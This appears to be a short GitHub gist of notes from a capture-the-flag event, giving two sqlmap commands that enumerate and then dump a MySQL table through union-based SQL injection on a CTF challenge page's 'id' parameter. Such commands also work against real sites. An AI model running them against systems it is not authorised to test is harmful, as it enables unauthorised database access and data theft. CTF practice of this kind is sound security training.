Skip to content

Instantly share code, notes, and snippets.

@xbaby123
Created February 5, 2017 04:13
Show Gist options
  • Select an option

  • Save xbaby123/a96062a651a326217fe49d0ce4dc4524 to your computer and use it in GitHub Desktop.

Select an option

Save xbaby123/a96062a651a326217fe49d0ce4dc4524 to your computer and use it in GitHub Desktop.
how to use sql map
-- enum tables
sqlmap -u http://joking.bitsctf.bits-quark.org/index.php --data="id=1&submit1=submit" -p id --dbms=MYSQL --technique=U --tables
-- dump table
sqlmap -u http://joking.bitsctf.bits-quark.org/index.php --data="id=1&submit1=submit" -p id --dbms=MYSQL --technique=U --dump -T Joker
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment